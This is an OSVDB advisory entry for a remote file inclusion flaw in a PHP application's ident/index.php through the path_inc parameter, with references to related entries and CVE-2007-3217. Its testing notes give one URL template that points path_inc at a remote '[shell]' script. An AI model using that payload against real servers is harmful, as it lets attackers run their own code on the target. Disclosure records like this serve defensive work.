Prototype of an PHP application ident/index.php path_inc Variable Remote File Inclusion

2007-06-01T00:00:00
ID OSVDB:37154
Type osvdb
Reporter OSVDB
Modified 2007-06-01T00:00:00

Description

Manual Testing Notes

http://[target]/script//ident/index.php?path_inc=[shell]

References:

Related OSVDB ID: 37151 Related OSVDB ID: 37152 Related OSVDB ID: 37153 Related OSVDB ID: 37158 Related OSVDB ID: 37161 Related OSVDB ID: 37149 Related OSVDB ID: 37156 Related OSVDB ID: 37160 Related OSVDB ID: 37155 Related OSVDB ID: 37157 Related OSVDB ID: 37150 Related OSVDB ID: 37159 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0008.html CVE-2007-3217 Bugtraq ID: 24266